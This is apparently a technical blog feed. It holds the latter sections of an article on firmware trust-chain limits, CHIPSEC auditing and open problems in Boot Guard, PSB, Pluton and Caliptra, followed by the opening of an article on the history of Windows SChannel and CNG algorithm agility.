The cost on EPYC is sharp. Once an OEM has burned its key hash into the PSP fuse on a given CPU, that CPU is irreversibly locked to that OEM. The chip cannot be resold into another OEM's platform that uses a different OEM key. Secondary-market liquidity for fused EPYC parts is essentially zero. This is not a hypothetical liability. Datacenter operators who refresh hardware on a 3-5 year cycle find that PSB-fused EPYC parts have markedly lower resale value than equivalent non-fused parts. The "right answer" depends on the customer's threat model, but the trade is real.

On Ryzen client parts, PSB has historically been opt-in per platform; many consumer Ryzen systems ship with PSB unfused and Pluton (where present) gated by the soft-fuse [@amd-psb-whitepaper] [@garrett-pluton-2022].

Caliptra: the open multi-signer answer

The most ambitious structural answer to the MSI-leak problem currently in active development is Caliptra, a CHIPS Alliance project announced on December 13, 2022 [@chipsalliance-caliptra]. Caliptra is "the specification, silicon logic, ROM and firmware for implementing a Root of Trust for Measurement (RTM) block inside an SoC" [@caliptra-repo]. The full RTL is open at chipsalliance/caliptra-rtl [@caliptra-rtl] and the firmware at chipsalliance/caliptra-sw [@caliptra-sw], both under Apache 2.0. The founding members include AMD, Google, Microsoft, and NVIDIA.

The structural properties Caliptra targets, which neither Boot Guard, PSB, nor Pluton currently provide on commodity client silicon, are: (1) open RTL so the trust anchor's silicon implementation is auditable gate-by-gate; (2) multi-signer support so a single OEM key compromise does not unilaterally compromise the trust chain; (3) datacenter-class scope first, with the design choices that follow from that target. Caliptra is not yet on shipping client silicon. It is the negative-space answer to the MSI leak: the structural fix that the chipset-fuse model does not have, but that the architecture community has now spent four years designing in the open.

Pluton closes the patch-latency gap. Caliptra closes the single-signer gap. Neither closes the supply-chain-of-silicon gap. That is the next section.

8. Theoretical Limits: Where the Chain Cannot Reach

Every defensive chain has a payload at the bottom -- the thing the chain ultimately protects against. The pre-boot trust chain protects against five attack classes. Here are the five it does not.

Key idea: The chain closes three threat classes well (OS-level rootkit persistence; signed-but-revoked bootloader chain-loading; remote firmware reflash without physical access) and structurally cannot close two others (physical-SPI-access before the platform is fused and locked; leaked OEM key on already-shipped silicon). Naming both sets is the precondition for any honest threat-model claim.

Limit 1 -- Physical SPI access bypasses everything above it

Even with Boot Guard or PSB enforced, an attacker who can write to SPI flash before the platform is fused and locked can overwrite the IBB and the BPM and own the next boot. Access vectors: manufacturing, repair, or certain integrated circuits that expose SPI on a debug header.

CHIPSEC [@chipsec-repo] [@chipsec-page] -- originated by Bulygin and colleagues at CanSecWest 2014 [@c7zero-chipsec] -- is the canonical pre-deployment audit framework for verifying the chipset write-protect bits on shipping platforms. Trammell Hudson's Thunderstrike, presented at 31C3 in December 2014 [@thunderstrike] [@ccc-31c3], is the canonical real-world demonstration: SPI substitution via a Thunderbolt Option ROM on Apple Mac EFI. It is the existence proof that "physical access plus the right bus" can bypass the silicon-rooted verifier when the platform's write-protections are not fully engaged.

Limit 2 -- A leaked OEM key cannot be revoked at the fuse layer

The MSI 2023 incident, recompressed: the FPF stores the hash of the OEM Boot Guard public key, not a revocation list against that hash. There is no fuse-layer primitive for marking the hash as "revoked." Once the corresponding private key leaks, every chip carrying that hash is permanently downgraded to a model in which the attacker can sign new Boot Guard firmware that the platform will accept [@binarly-msi] [@helpnet-msi-leak] [@register-msi-alt].

The structural fix is per-batch key derivation or multi-signer trust anchors; on commodity client silicon in 2026 this fix exists only as a design specification (Caliptra) and not as a shipped product [@caliptra-repo] [@chipsalliance-caliptra]. Eclypsium's "Vulnerable Boot Guard implementations" series [@eclypsium-blog] documents that the MSI leak is the third or fourth such incident across the Boot Guard vendor space. Lenovo, HP, Compal, and Quanta have all experienced similar leaks; MSI is simply the most extensively catalogued.

Limit 3 -- The trust chain cannot defend against malicious silicon

If the verifier chip itself is malicious -- substituted upstream of the customer's supply chain -- the chain's invariants do not hold, because the bottom of the chain is what defines the trust model. Defending against this class is the supply-chain-of-silicon problem and is out of scope for this article. The open-RTL property of Caliptra is partial mitigation in the sense that the customer can at least verify that the silicon matches the specification, but verifying that a fabricated die corresponds to its RTL is an entirely separate research programme.

Limit 4 -- Thunderbolt SPI is a separate SPI region

Bjorn Ruytenberg's Thunderspy disclosure on May 10, 2020 [@thunderspy-report] [@thunderspy-site] targeted firmware vulnerabilities in the Thunderbolt controller chip on PCs with Thunderbolt 1 / 2 / 3 ports. The controller has its own firmware in its own SPI region, distinct from the main BIOS SPI region that Boot Guard / PSB verify.

Thunderspy let an attacker with physical access to the port flash modified Thunderbolt controller firmware, weakening the DMA isolation Thunderbolt 3 was supposed to provide. Thunderspy did not bypass Boot Guard, PSB, or Secure Boot. It bypassed a different verifier in a different SPI region for a different protocol.

The conflation -- "Thunderspy broke Secure Boot" -- appeared in early press coverage and persists in some secondary writing. The primary report is unambiguous that the target was Thunderbolt controller firmware [@thunderspy-report].

The structural lesson generalises beyond Thunderbolt: "SPI" on a modern PC is not a single trust domain. The main BIOS region, the Thunderbolt controller, the Embedded Controller, the fingerprint reader, and (on servers) the BMC each have their own SPI regions, their own update mechanisms, and their own verifier (if any). A vulnerability in one does not necessarily affect the others; but inventorying which regions are independently verified is a non-trivial procurement exercise.

Limit 5 -- The ME and PSP are themselves attack surface

The CSME and PSP exist to verify the platform's trust chain, but they are themselves programs running on processors. They have bugs. The disclosure record is sobering:

INTEL-SA-00086 (November 2017). Remote code execution in CSME via CVE-2017-5705, CVE-2017-5706, CVE-2017-5708, and CVE-2017-5712, pre-disclosed by the Ermolov / Goryachy BH EU 2017 work [@intel-sa-00086] [@ermolov-goryachy-2017].
CVE-2020-8705. A Boot Guard ACM vulnerability in the S3-resume code path that Trammell Hudson wrote up [@cve-2020-8705-nvd] [@trmm-sleep].
One Glitch to Rule Them All (CCS 2021). Buhren, Jacob, Krachenfels, and Seifert demonstrated voltage-glitching attacks against the AMD PSP on Zen 1, Zen 2, and Zen 3 [@one-glitch-2021], with open tooling at PSPReverse/amd-sp-glitch [@psp-glitch-repo].
faulTPM (USENIX Security 2024). The follow-up paper (arXiv v1 April 28, 2023) showed the same primitive could extract sealed TPM blobs from AMD fTPM, enabling BitLocker key recovery on devices using AMD fTPM-as-TPM [@faultpm-2023].

The faulTPM hardware cost is in the low hundreds of US dollars (commodity microcontroller plus voltage-glitching circuit). The capability the cost buys is full extraction of fTPM-sealed blobs. The "expensive nation-state-grade attack" framing does not apply here.

These attacks do not break the concept of a silicon-rooted trust chain. They break specific implementations of it. The conceptual chain is sound; the engineering surface inside each implementation has bugs that, once disclosed, get patched and shifted up the cadence. The pattern is structurally similar to OS kernel CVE disclosures. The existence of bugs does not mean the kernel concept fails; it means kernels need patch cadence. The difference at the firmware layer is that patch cadence at the CSME or PSP runs through the OEM BIOS update pipeline, which is slower than the OS pipeline by a factor of roughly ten.

Five limits. The first three are deep. The last two are open research.

9. Open Problems: What Is Still Being Researched

Five open problems. Three are about the chain. Two are about who gets to see inside it.

OEM key-management hygiene at industry scale. The Eclypsium series on leaked Boot Guard keys covers Compal, Quanta, Lenovo, and MSI across multiple disclosures [@eclypsium-blog]. The structural fix -- per-batch keys, multi-signer trust anchors, hardware-bound signing services -- exists as Caliptra in specification [@caliptra-repo] but not in shipping client silicon. The 2026 research question is not "do we know how to solve this" but "when and on which silicon families does Caliptra (or an equivalent) actually ship to consumer platforms."

Pluton firmware-runtime transparency. Microsoft has committed to a "Rust-based firmware foundation" for Pluton on 2024+ AMD and Intel systems [@pluton-learn] but has not publicly named the specific runtime. Community speculation around Tock OS [@tockos] (an embedded Rust kernel designed for security-critical microcontrollers) remains speculation; the connection has not been confirmed by Microsoft. Microsoft also has not published gate-level documentation of the Pluton silicon. The accountability gap -- "we asked you to trust this runtime; what is it" -- is itself an open problem and is the single most-cited objection to Pluton in the open-firmware community.

The Linux side of the KB5025885 transition. Shim distributions must coordinate with the PCA2011 to PCA2023 cutover or face boot failures on enforced-Secure-Boot multi-OS estates [@garrett-shim-19448] [@garrett-shim-17872] [@sbat-md]. Matthew Garrett's 2012 first-hand description of shim remains the cross-vendor architectural reference, and his 2022 / 2023 follow-ups document the operational hazards. The risk is not theoretical: a distribution that ships a shim signed only by PCA2011 and does not coordinate the migration to PCA2023 will not boot on Windows 11 systems that have completed the KB5025885 cutover.

Vendor-level attestation incompatibility. TCG TPM 2.0 quotes [@tcg-tpm-lib] are widely supported, but vendor-level attestation (Intel SGX DCAP [@sgx-dca], AMD SEV-SNP attestation, Pluton attestation) remain three incompatible schemes with three sets of root certificates, three quote formats, and three verifier libraries. A relying party that wants to attest a Confidential VM running on a mixed-vendor fleet must integrate against all three. The TPM 2.0 quote covers only the rungs visible to the TPM; it does not attest the CSME runtime, the PSP runtime, or the Pluton runtime in a vendor-neutral way.

DRTM deployment and revocation maturity. Windows 11 Secured-core requires DRTM via Intel TXT or AMD SKINIT, but mature revocation for DRTM-measured payloads is nascent. AMD fTPM glitch resistance on Zen 4+ is not yet publicly gate-level documented; the faulTPM team explicitly left Zen 4+ for future work [@faultpm-2023], and the absence of vendor disclosure leaves the question open at the level of public knowledge.

That is the research frontier. What follows is the practitioner's manual.

10. Practical Guide: How to Audit, Configure, and Reason About the Chain

Three audiences. Three checklists. One decision tree.

For the procurement architect: the seven-question silicon checklist

flowchart TD Q1{"Boot Guard enforced (profile 4 or 5) on Intel, or PSB-enforced on AMD?"} Q2{"PSB-fused to the correct OEM (not another OEM's key)?"} Q3{"Pluton present AND not gated by the OEM soft fuse?"} Q4{"DRTM-capable, Intel TXT or AMD SKINIT?"} Q5{"KB5025885 cumulative update applied?"} Q6{"PCA2023 present in db?"} Q7{"dbx SVN current per Microsoft January 2026 baseline?"} OK[Procurement-grade Secured-core posture] BAD[Reject or remediate before deployment] Q1 -- yes --> Q2 Q1 -- no --> BAD Q2 -- yes --> Q3 Q2 -- no --> BAD Q3 -- yes --> Q4 Q3 -- no --> BAD Q4 -- yes --> Q5 Q4 -- no --> BAD Q5 -- yes --> Q6 Q5 -- no --> BAD Q6 -- yes --> Q7 Q6 -- no --> BAD Q7 -- yes --> OK Q7 -- no --> BAD

For the firmware engineer: SBAT versus dbx revocation capacity

The asymmetric-revocation point gets sharper when you run it as code. The shim SBAT documentation makes the capacity claim concrete: "This single revocation event consumes 10kB of the 32kB, or roughly one third, of revocation storage typically available on UEFI platforms" [@sbat-md]. The block below shows what a single SBAT generation bump replaces in dbx storage.

{const DBX_CAPACITY_BYTES = 32 * 1024; const SHA256_HASH_BYTES = 32; const SBAT_ENTRY_BYTES = 40; const dbxCapacityHashes = Math.floor(DBX_CAPACITY_BYTES / SHA256_HASH_BYTES); const sbatCapacityEntries = Math.floor(DBX_CAPACITY_BYTES / SBAT_ENTRY_BYTES); console.log('dbx capacity in SHA-256 hashes :', dbxCapacityHashes); console.log('Equivalent SBAT generation rows :', sbatCapacityEntries); console.log(); const vulnerableShimBuilds = 256; const dbxBytesForShim = vulnerableShimBuilds * SHA256_HASH_BYTES; const dbxFractionUsed = (dbxBytesForShim / DBX_CAPACITY_BYTES * 100).toFixed(1); const sbatBytesForShim = 1 * SBAT_ENTRY_BYTES; const sbatFractionUsed = (sbatBytesForShim / DBX_CAPACITY_BYTES * 100).toFixed(1); console.log('Revoking', vulnerableShimBuilds, 'distinct vulnerable shim builds:'); console.log(' via dbx hashes :', dbxBytesForShim, 'bytes -', dbxFractionUsed + '% of capacity'); console.log(' via SBAT bump :', sbatBytesForShim, 'bytes -', sbatFractionUsed + '% of capacity'); console.log(); console.log('SBAT is roughly 256x more capacity-efficient at revoking entire vulnerability classes.');}

For the detection engineer: CHIPSEC modules per chain rung

Chain rung	CHIPSEC module	What it audits
SPI access policy (rung 1-2)	`common.spi_access`	SPI controller access permissions and region descriptors
SPI descriptor lockdown	`common.spi_desc`	SPI flash descriptor lock bit (FLOCKDN)
BIOS write-protect	`common.bios_wp`	BIOSWE / BLE / SMM_BWP configuration
BIOS timestamp	`common.bios_ts`	BIOS update timestamp consistency
SMM lockdown	`common.smm`	System Management Mode protections including SMM_BWP
SPI controller lockdown	`spi.spi_lock`	Per-region SPI write-protect and SPI controller lock

The full CHIPSEC module catalogue is in the chipsec/modules directory of the project repository [@chipsec-repo] [@chipsec-page]. A typical pre-deployment audit runs chipsec_main with the platform-specific module set and produces a per-module pass / fail report; any FAIL on the modules above maps directly to a known CVE class.

On a CHIPSEC-supported platform (Linux or Windows, with the kernel driver installed), `sudo chipsec_main` runs the full default module set against the current platform and prints a per-module PASS / FAIL summary. To restrict to the SPI / BIOS protection subset above, use `sudo chipsec_main -m common.bios_wp -m common.spi_desc -m common.spi_access -m spi.spi_lock -m common.smm -m common.bios_ts`. Read the CHIPSEC manual at [@chipsec-page] before running on production hardware; some modules touch SMI handlers and can wedge a misconfigured platform.

For the threat-model architect: three closed, three open

The chain closes three threat classes:

OS-level rootkit persistence below the kernel (Mebromi-class attacks against unprotected SPI).
Signed-but-revoked bootloader chain-loading (BlackLotus-class attacks against bootmgfw + Secure Boot).
Remote firmware reflash without physical access (driver-class attacks against poorly-locked SPI controllers).

The chain does not close three other classes:

Physical-SPI-access before the platform is fused and locked (Thunderstrike-class attacks via debug headers or controller ports).
Leaked OEM key on already-shipped silicon (MSI 2023-class capability transfers).
Supply-chain compromise of the silicon itself (the most-cited but operationally rarest class).

Practitioner alternative stacks

Note: If the OEM trust chain does not meet your threat model, the open-firmware community has an alternative for many platforms. - coreboot [@coreboot-org] [@wiki-coreboot] (originated as LinuxBIOS at Los Alamos National Laboratory in 1999) is the most widely deployed open firmware, shipping by default on every Chromebook. - Heads [@heads-repo] (Trammell Hudson's payload) runs on top of coreboot to provide TPM-measured boot with second-factor attestation (typically a YubiKey). It is the high-assurance Linux deployment baseline of choice for several investigative-journalism shops. - EDK II [@edk2-repo] is the reference open-source UEFI implementation if you need UEFI semantics rather than coreboot semantics. None of these magically restore revocation at the fuse layer, but they remove the OEM signing infrastructure as a single point of failure for everything above the fuse.

You now have the chain, the limits, and the controls. The FAQ kills the recurring misconceptions.

11. Frequently Asked Questions

Secure Boot in the abstract protects against unsigned-bootloader execution; it does not by itself protect against signed-but-vulnerable bootloader execution. BlackLotus exploited CVE-2022-21894 against a Microsoft-signed boot manager [@cve-2022-21894-nvd] [@eset-blacklotus]. The vulnerable binary was still signed -- and "patched" is not the same as "revoked." Until Microsoft adds the vulnerable binary's hash to dbx (which is what KB5025885 does, on a multi-year staged rollout to avoid bricking unpatched systems [@kb5025885]), Secure Boot will continue to load and execute the vulnerable binary. No -- see §6 Callout. KB5025885 modifies DB (PCA2023 added) and DBX (vulnerable bootmgfw hashes added); the Platform Key is untouched [@kb5025885]. This is a threat-model question, not a factual one. The Intel ME (now CSME on Skylake and later) runs MINIX 3 [@wiki-ime] [@tanenbaum-letter] and provides a set of services that the OEM may or may not have enabled: Active Management Technology, PTT firmware TPM, and Identity Protection Technology, among others [@intel-csme-whitepaper]. Whether you call that "a backdoor" depends on whether you consider remote attestation, hardware-rooted identity, and out-of-band management to be services or threats. The factual content is that the CSME runs, has its own runtime, has had CVEs (INTEL-SA-00086 [@intel-sa-00086] [@ermolov-goryachy-2017]), and ships on essentially every consumer Intel platform since Skylake. No. The name appears to be a confabulation that does not correspond to any verifiable primary research. The real SPI-write research bases for the pre-boot chain are Thunderstrike (Trammell Hudson, 31C3, December 2014 [@thunderstrike] [@ccc-31c3]), CHIPSEC (Bulygin et al., CanSecWest 2014 [@c7zero-chipsec]), and LogoFAIL post-exploitation (Binarly, December 2023 [@binarly-logofail]). If you see "Hudson Hammer" cited, treat it as a hallucinated reference. No -- Thunderspy targets a separate SPI region for the Thunderbolt controller. See §8 Limit 4 for the full mechanism [@thunderspy-report]. Cortex-A5 with TrustZone is the well-attested answer for Family 15h and Family 17h (see §3 hedge for the reverse-engineering corpus). Cortex-A7 is unsupported by any vendor primary or community reverse engineering. Family 19h and later is not publicly documented. No -- pre-Skylake ME (1 through 10) ran ThreadX on ARC; ME 11 (Skylake) introduced MINIX 3 on Intel Quark; Ice Lake and later CSME moved to Tremont-class x86 but kept MINIX 3. See the §3 generational table [@wiki-ime]. Because capability transfer is permanent regardless of when it gets operationalised. The leaked keys correspond to public-key hashes that have already been burned into the FPF on every affected chip [@binarly-msi] [@helpnet-msi-leak]. There is no fuse-layer revocation primitive [@register-msi-alt]. The chips are permanently downgraded to a model in which an attacker who has the leaked keys can sign new Boot Guard firmware that the platform will accept. The waiting time between disclosure and operationalisation is the only variable; the structural condition is not recoverable.

Closing thought

You came in believing Secure Boot was the trust anchor. You leave knowing it is the fifth rung. The four rungs below it -- microcode, ACM or PSP boot ROM, FPF or OEM-key fuse policy read, IBB verification -- are the ones that actually anchor the chain. The most permanent of those is the bottom rung, and the most permanent rung is also the one with no revocation surface. Read those two sentences together and you have the whole article in a paragraph. Read them with the MSI 2023 leak in mind and you have the reason this article needed to exist.

Rotating Every Cipher: SChannel and the Twenty-Year Algorithm-Agility Story of Windows TLS

noreply@paragmali.com (Parag Mali) — Wed, 03 Jun 2026 00:00:00 GMT

Windows speaks TLS through **SChannel**, the SSPI provider in `schannel.dll` [@ms-learn-schannel-ssp]. Across roughly twenty years SChannel has rotated every cryptographic primitive in its default cipher list -- from RSA key transport and RC4 to ECDHE, AES-GCM, and ML-KEM -- without breaking IIS, RDP, SQL Server, LDAPS, WinHTTP, or .NET `SslStream`. That was only possible because Microsoft, in Vista's 2007 **CNG** (Cryptography API: Next Generation), made algorithm agility a first-class architectural property [@ms-learn-cng-portal]: BCrypt for primitive dispatch, NCrypt for key custodians, SymCrypt as the unified FIPS-validated backend [@symcrypt-github]. This article walks the substrate from CryptoAPI 1.0 through CNG and SymCrypt, the five cipher-suite generations the substrate carried, the 2014 MS14-066 / WinShock RCE (which was *not* Heartbleed) [@ms14-066], the certificate-validation pipeline, and the in-flight post-quantum hybrid TLS 1.3 rollout (`X25519MLKEM768`, FIPS 203) [@fips-203][@ms-learn-cng-mlkem-examples].

1. Two PowerShell Outputs, Twelve Years Apart

Run Get-TlsCipherSuite on a freshly installed Windows Server 2025 and the output is unrecognisable to a 2012 administrator [@ms-learn-get-tlsciphersuite]. RC4 is gone. 3DES is gone. The list is led by TLS_AES_256_GCM_SHA384 and TLS_AES_128_GCM_SHA256 -- TLS 1.3 cipher suites that did not exist when schannel.dll was first written. Yet IIS, SQL Server, RDP via CredSSP, LDAPS, WinHTTP, and every .NET SslStream consumer on the planet still compiles against the same Win32 SSPI surface they did in 2007 [@ms-learn-schannel-ssp]. How does one DLL rotate every cryptographic primitive in its lineup without breaking the world above it?

That question is this article's organising prompt. The answer, held back deliberately until Section 4, is algorithm agility -- the architectural property Microsoft made first-class when it shipped Cryptography API: Next Generation alongside Windows Vista in early 2007 [@ms-learn-cng-portal].

The Win32 abstraction that lets an application acquire credentials, build a security context, and exchange authentication tokens without knowing which protocol (Kerberos, NTLM, Negotiate, or **Schannel**) is doing the work underneath. SChannel is the SSP that implements SSL, TLS, and DTLS on Windows; its module is `schannel.dll` and its public surface is `AcquireCredentialsHandle` / `InitializeSecurityContext` / `AcceptSecurityContext` [@ms-learn-schannel-ssp].

Which Windows endpoints SChannel actually owns

SChannel is not the only TLS stack that runs on Windows, but the Windows TLS endpoints Microsoft itself owns all run through it. SChannel is the SSP behind:

IIS TLS termination for HTTP/1.1 and HTTP/2 (HTTP/3 over QUIC terminates in msquic.dll, which uses SChannel for the TLS 1.3 handshake key derivation and then performs the per-packet AEAD outside schannel.dll per RFC 9001 §5 [@msquic-tls-md][@rfc-9001]).
RDP Network Level Authentication via CredSSP -- the CredSSP SSP wraps SChannel to deliver the TLS-protected credential prompt before the RDP session opens.
LDAPS for Active Directory client and server bindings.
RPC over HTTPS as used by Outlook Anywhere and historical Exchange topologies.
SQL Server TDS-over-TLS encryption on Windows.
WinHTTP and WinINet -- the Win32 HTTP clients behind BITS, WebClient, and many enterprise agents.
.NET SslStream when running on Windows. On Linux .NET delegates to OpenSSL; on macOS it uses Apple's Network framework.

The endpoints SChannel does not own on a typical Windows box are equally important to name. Chromium and (via Chromium) Microsoft Edge ship BoringSSL -- legacy EdgeHTML used Windows native crypto, but it has been end-of-life since Edge's January 15, 2020 Chromium-based re-launch. Firefox ships NSS. Containerised .NET workloads on Linux ship with OpenSSL. SQL Server on Linux uses OpenSSL too [@boringssl-readme][@dotnet-cross-platform-crypto]. The Windows TLS story is genuinely a Windows-platform story, not a "what speaks TLS on a Windows machine" story.On Linux, .NET's SslStream does not use SChannel at all -- it delegates to OpenSSL [@dotnet-cross-platform-crypto]. The Win32 SChannel story really is a Windows-platform story, not a story about everything TLS-shaped that happens on a Windows machine.MsQuic uses SChannel only for the TLS 1.3 handshake key derivation -- the per-packet AEAD that protects QUIC payloads runs outside schannel.dll, in MsQuic itself, per RFC 9001 §5 packet protection [@msquic-tls-md][@rfc-9001]. The MsQuic project documents the TLS abstraction layer (CxPlatTlsProcessData) and notes explicitly that "the TLS record layer is not included" and that "TLS exposes the encryption key material to QUIC to secure its own packets" [@msquic-tls-md].

The artifact comparison

The cleanest way to see the substrate's twenty-year track record is to compare what Get-TlsCipherSuite returns on two Windows generations [@ms-learn-get-tlsciphersuite][@ms-learn-cipher-suites-schannel]. The TLS 1.3 cipher suites listed on the Windows Server 2022 / 2025 page (TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256) [@ms-learn-tls-cipher-suites-server-2022] simply are not on the Windows 7 / Server 2008 R2 page [@ms-learn-tls-cipher-suites-windows-7]; conversely, the Windows 7 page enumerates TLS_RSA_WITH_RC4_128_SHA, TLS_RSA_WITH_3DES_EDE_CBC_SHA, and TLS_RSA_WITH_AES_128_CBC_SHA as enabled by default -- suites that newer Windows builds have either removed or moved off-by-default [@ms-learn-tls-registry-settings].

{` // Approximation of the SChannel cipher-suite roster on two Windows generations. const server2012R2 = [ 'TLS_RSA_WITH_RC4_128_SHA', 'TLS_RSA_WITH_3DES_EDE_CBC_SHA', 'TLS_RSA_WITH_AES_128_CBC_SHA', 'TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA', 'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256', ];

const server2025 = [ 'TLS_AES_256_GCM_SHA384', 'TLS_AES_128_GCM_SHA256', 'TLS_CHACHA20_POLY1305_SHA256', 'TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384', 'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256', ];

const rotatedOut = server2012R2.filter(s => !server2025.includes(s)); const rotatedIn = server2025.filter(s => !server2012R2.includes(s));

console.log('Rotated out (2012R2 default -> 2025 absent):'); rotatedOut.forEach(s => console.log(' - ' + s)); console.log('Rotated in (2025 default -> 2012R2 unavailable):'); rotatedIn.forEach(s => console.log(' + ' + s)); `}

The whole journey, on one timeline:

gantt dateFormat YYYY axisFormat %Y title SChannel substrate eras and primitive rotations section Substrate CryptoAPI 1.0 (CSPs) :crit, capi, 1996, 2007 CNG (BCrypt + NCrypt) :active, cng, 2007, 2026 SymCrypt unified engine :sym, 2017, 2026 section Protocol versions SSL 2.0 / 3.0 / TLS 1.0 :p10, 1996, 2014 TLS 1.1 / 1.2 :p12, 2008, 2026 TLS 1.3 default-on :p13, 2021, 2026 section Cipher generations ECDHE plus AES-GCM debut :g1, 2009, 2026 RC4 deprecation :g2, 2013, 2016 3DES retirement :g3, 2019, 2026 SHA-1 sunset :g4, 2016, 2022 TLS 1.0 / 1.1 off-default :g5, 2020, 2025 X25519MLKEM768 hybrid :g6, 2025, 2026

CNG did not exist for the first eleven years of SChannel's life. To see why CNG had to be invented, the next section walks the rigidity that almost broke the Windows TLS stack before AES could even be standardised.

2. Before CNG: PCT 1.0, SSL, and the Tyranny of `ALG_ID`

In October 1995 a five-author byline from Microsoft Corporation -- Josh Benaloh, Butler Lampson, Daniel Simon, Terence Spies, and Bennet Yee -- posted draft-benaloh-pct-00 to the IETF [@draft-benaloh-pct-00]. The draft introduced Private Communication Technology version 1, a protocol whose abstract reads: "this protocol corrects or improves on several weaknesses of SSL." The byline matters. Butler Lampson had received the Turing Award in 1992. Microsoft was not toying with PCT; it intended to win the secure-transport standardisation race.Butler Lampson's appearance on the PCT 1.0 draft byline (alongside Benaloh, Simon, Spies, Yee) is not incidental. Lampson won the Turing Award in 1992. Microsoft was serious about PCT 1.0 as a protocol, not merely an implementation.

PCT lost. By the time schannel.dll shipped in Windows NT 4.0 (commonly placed in 1996 per contemporary release histories), the new SChannel SSP had to negotiate three incompatible handshakes on the same wire: SSL 2.0, SSL 3.0, and PCT 1.0 [@ms-learn-schannel-ssp]. By Vista, PCT was gone; SSL 2.0 was on its way to formal IETF prohibition [@rfc-6176]; SSL 3.0 had a few years left before POODLE would kill it off in 2014 [@poodle-pdf]. The protocol-level story is well-trodden. The substrate underneath -- the engine SChannel called into to compute each primitive -- is what made the next decade much harder than it had to be.

CryptoAPI 1.0 and the CSP cage

A loadable DLL that implements a fixed catalog of cryptographic operations under **CryptoAPI 1.0**. Each CSP advertises a *provider type* (e.g. `PROV_RSA_FULL`, `PROV_RSA_SCHANNEL`) and exposes its primitives through opaque `ALG_ID` constants such as `CALG_RC4`, `CALG_3DES`, and `CALG_SHA1`. Adding a new primitive meant shipping a new CSP DLL, registering it under `HKLM\Software\Microsoft\Cryptography\Defaults\Provider`, and threading a fresh BLOB type through every consumer that called `CryptAcquireContext`.

The CryptoAPI 1.0 model had a single fatal property: the primitive was the API. To compute SHA-256, code had to ask CAPI for an ALG_ID whose numeric value was CALG_SHA_256 -- and that constant only existed once Microsoft shipped a CSP that defined it, in the same OS release that introduced the algorithm [@ms-learn-alg-id]. Elliptic-curve cryptography never arrived in CAPI in any usable form; the ALG_ID + key BLOB shape simply could not express the named curves, parameter sets, point-compression flags, or per-curve coordinate sizes that ECC required.

So in the early 2000s SChannel's cipher-suite list was less a menu of cryptography and more a snapshot of what CSPs had shipped. FIPS 197 (the AES standard) was published in November 2001. Windows XP shipped without AES in its default SChannel cipher list and only got it broadly via Service Pack 3 and Server 2003. The four-year AES gap was not Microsoft dragging its feet -- it was the thickness of a CSP-rev cycle. RC4 dominance, 3DES persistence, 1024-bit RSA inertia, no ECC: these were the substrate's fingerprints, not the vendor's preferences.

flowchart LR A[Application -- IIS / IE / RPC] --> B[SChannel SSP] B --> C[CryptoAPI 1.0 / CryptAcquireContext] C --> D["RSA SChannel CSP -- ALG_ID lookup"] C --> E["Base / Enhanced CSP -- ALG_ID lookup"] C --> F[Smart Card CSP] D -. "Adding ECC requires a new CSP, new ALG_ID, new BLOB type, new IANA codepoint" .-> G((Friction)) E -. "Adding SHA-256 requires CSP rev + OS release" .-> G

The PCT failure as a positive lesson

PCT's loss is, in retrospect, the strongest early case for algorithm agility. SChannel had shipped PCT-the-protocol in 1996; by 2007 PCT was a footnote and SChannel was speaking TLS 1.0, TLS 1.1, SSL 3.0, and (with the right service pack) early TLS 1.2 drafts. The application surface above SChannel did not flinch. Microsoft had bet on PCT, lost, rotated to TLS, and shipped the rotation through the protocol abstraction that the SSP boundary provided.

What the SSP boundary did not shield was the primitive layer. Algorithm rotation had to happen one CSP rev at a time. By the mid-2000s Microsoft's engineering leadership had a clear diagnosis: the protocol abstraction worked; the primitive abstraction did not. The next CSP rev would not save them, because there were not enough CSP revs in the future to keep up with what cryptography was about to do -- ECC was already standardised, AEAD constructions were being designed, and the post-quantum research had been live for a decade.

Key idea: The early-2000s lag in AES adoption, the persistence of RC4 and 3DES, and the absence of ECC in Windows were not vendor laziness. CryptoAPI 1.0's ALG_ID + provider-type model was structurally incapable of representing ECC's named curves and parameter sets. The right question was never "why is Microsoft slow?" -- it was "what would a Windows cryptographic substrate that was not slow look like?" The Vista CNG redesign is what that question's answer looks like.

RC4 dominance, 3DES persistence, 1024-bit RSA inertia, no ECC -- these were not laziness, they were the substrate. A fix to TLS 1.0 was easy; a fix to the way Windows let an application reach a primitive was a rewrite.

3. Configuration Agility Without Substrate Agility: XP and Server 2003

Consider a single registry path: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Client\DisabledByDefault. That value was introduced for SChannel's TLS 1.0 support in the XP / Server 2003 era. It is exactly the same registry sub-tree path an operator uses in 2026 to disable TLS 1.0 itself [@ms-learn-tls-registry-settings]. The configuration surface from 1999 has outlasted three generations of TLS.

This is not an accident. By the time TLS 1.0 landed in Windows (RFC 2246, Tim Dierks and Christopher Allen at Certicom, January 1999 [@rfc-2246]) and TLS 1.1 followed (RFC 4346, Dierks and Eric Rescorla, April 2006 [@rfc-4346]), SChannel had developed an emerging design pattern: every protocol version became a sub-key, every cipher suite became a registry-driven enable/disable, and the SSL Cipher Suite Order Group Policy gave administrators a single rope to pull when an algorithm fell from grace.

That model has aged well. Microsoft's current tls-registry-settings page is essentially the same structural document it would have been twenty years ago, with new sub-keys for each new protocol version (SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, TLS 1.2, TLS 1.3, DTLS 1.0, DTLS 1.2) and new values for the policy levers Microsoft has added along the way [@ms-learn-tls-registry-settings].The same SCHANNEL\Protocols\<ver>\<role>\Enabled pattern handles SSL 2, SSL 3, TLS 1.0, TLS 1.1, TLS 1.2, TLS 1.3, DTLS 1.0, and DTLS 1.2. A single sub-key per protocol; new versions slot in without reorganising the hive.

The four sub-keys an XP / Server 2003 box exposed

